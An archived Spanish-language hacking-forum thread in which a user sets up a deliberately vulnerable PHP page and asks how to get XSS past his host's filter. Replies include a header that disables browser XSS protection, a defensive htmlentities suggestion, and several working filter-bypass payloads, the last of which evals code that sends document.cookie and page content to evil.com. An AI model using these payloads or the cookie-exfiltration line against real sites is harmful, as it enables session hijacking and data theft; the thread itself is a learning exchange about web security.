elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  XSS host protect
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: XSS host protect  (Leído 5,404 veces)
patilanz


Desconectado Desconectado

Mensajes: 481

555-555-0199@example.com


Ver Perfil WWW
XSS host protect
« en: 12 Octubre 2014, 10:53 am »

Hola es posible que tu hosting te proteja de ataques XSS porque estoy utilizando hostinger.es y me hice una pagina de prueba en plan:
Código
  1. Hola <?php echo $_GET['name'];?>
Pero al poner pagina?hola = <script>alert()</script>
Me muestra que la pagina no existe error 404.
También probé métodos de https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet pero no consigo con ninguno. 
El background:url(javscript... todavía funciona?

Saludos
En línea

#!drvy


Desconectado Desconectado

Mensajes: 5.855



Ver Perfil WWW
Re: XSS host protect
« Respuesta #1 en: 12 Octubre 2014, 11:40 am »

Es posible pero antes asegurate de otras cosas.

Citar
Pero al poner pagina?hola = <script>alert()</script>

¿ Pones pagina?hola= o pagina.php?hola= ? Si es el primer caso, tienes alguna regla tipo mod_rewrite que haga de router ?

También ten en cuenta que algunos navegadores (safari,chrome,ie...) tienen filtros anti-xss por defecto. Tienes que mandar un header() para que los desactiven.

Código
  1. header('X-XSS-Protection: 0');

Saludos
En línea

patilanz


Desconectado Desconectado

Mensajes: 481

555-555-0199@example.com


Ver Perfil WWW
Re: XSS host protect
« Respuesta #2 en: 12 Octubre 2014, 14:59 pm »

He desactivado el filtro de chrome antes usaba firefox con tor o ie con el filtro desactivado.
Mi pagina es pagina.php?name=...
He cambiado el archivo un poco:

Código
  1. Hola <a href=" <?php echo $_GET['name'];?> " /><?php echo $_GET['name'];?></a>

Luego con esto http://pruebasdephp.hol.es/XSS_test.php?name=javascript:location.href=%27http://www.google.es%27

Consigo redireccionar hacia google. Luego intente con 'http://www.google.es?a='+document.cookie" pero no me muestra el +

La alerta tampoco consigo poner la
En línea

daryo


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: XSS host protect
« Respuesta #3 en: 12 Octubre 2014, 16:15 pm »

usa htmlentities
http://www.w3schools.com/php/func_string_htmlentities.asp
Código
  1. <?php echo htmlentities($_GET['name']);?>
En línea

buenas
patilanz


Desconectado Desconectado

Mensajes: 481

555-555-0199@example.com


Ver Perfil WWW
Re: XSS host protect
« Respuesta #4 en: 12 Octubre 2014, 19:27 pm »

Lo que quiero no es defender me si no lo contrario. Voy a poner la pagina si alguien consigue hacer una alerta o cookies o cualquier otra cosa con XSS y luego si me puede ensenar como lo ha hecho  ;D

http://pruebasdephp.hol.es/XSS_test.php

Saludos
En línea

daryo


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: XSS host protect
« Respuesta #5 en: 12 Octubre 2014, 20:02 pm »

a en firefox y opera me funciona:
Citar

lo que vendria a significar:
Código:
http://pruebasdephp.hol.es/XSS_test.php?name=</a><img src=/ onerror="location.href='http://www.google.es'"></img>

no recuerdo muy bien pero los xss de chrome son diferentes
« Última modificación: 12 Octubre 2014, 20:06 pm por daryo » En línea

buenas
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: XSS host protect
« Respuesta #6 en: 15 Octubre 2014, 23:34 pm »

Buscas algo así?

http://pruebasdephp.hol.es/XSS_test.php?name=x"><img onerror="a=alert;a('XSS by WHK')" src="x

El ids (sistema de detección de intrusos) de hol.es es bastante malo, usan listas negras bastantes pobres, puedes bbypasear los filtros de muchas maneras. Bypasear el filtro de google chrome es un poco mas difícil pero también tiene sus formas de hacerlo.

Edito:

Aqui tienes un XSS que bypasea el filtro de hol.es y el de Google Chrome 38.0 y funciona en todos los navegadores a la fecha con o sin filtro:

http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror="a=alert;a(0911)

Realmente crees que los filtros son suficientes para detener un ataque?, yo creo que no.

Acá hay otro XSS compatible con hol.es y google chrome:

http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror=";a=alert;a(location.hash.substr(1))#XSS by WHK

Acá un XSS mas peligroso compatible con todos los navegadores con filtros anti xss y hosteado en hol.es:

http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror=";a=eval;a(location.hash.substr(1))#document.location="http://evil.com/?recibe=" + escape(document.cookie) + ': ' + escape(document.body.innerHTML);

Saludos.
« Última modificación: 16 Octubre 2014, 00:08 am por WHK » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
ASPACK PROTECT « 1 2 3 »
Ingeniería Inversa
dragonballz 27 19,002 Último mensaje 14 Octubre 2005, 22:35 pm
por Canelis
Protect Apps (Source) « 1 2 »
Programación Visual Basic
cobein 18 6,278 Último mensaje 31 Mayo 2008, 17:59 pm
por SERBice
WPS : Descubierta vulnerabilidad en el WPS (Wi-Fi Protect Setup) de los routers
Noticias
wolfbcn 0 1,840 Último mensaje 28 Diciembre 2011, 02:13 am
por wolfbcn
Unpack Enigma & VM Protect.
Ingeniería Inversa
Geovane 0 3,450 Último mensaje 16 Abril 2018, 19:52 pm
por Geovane
VM-PROTECT UNPACK
Ingeniería Inversa
Geovane 3 2,926 Último mensaje 14 Noviembre 2018, 11:20 am
por FranFin
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines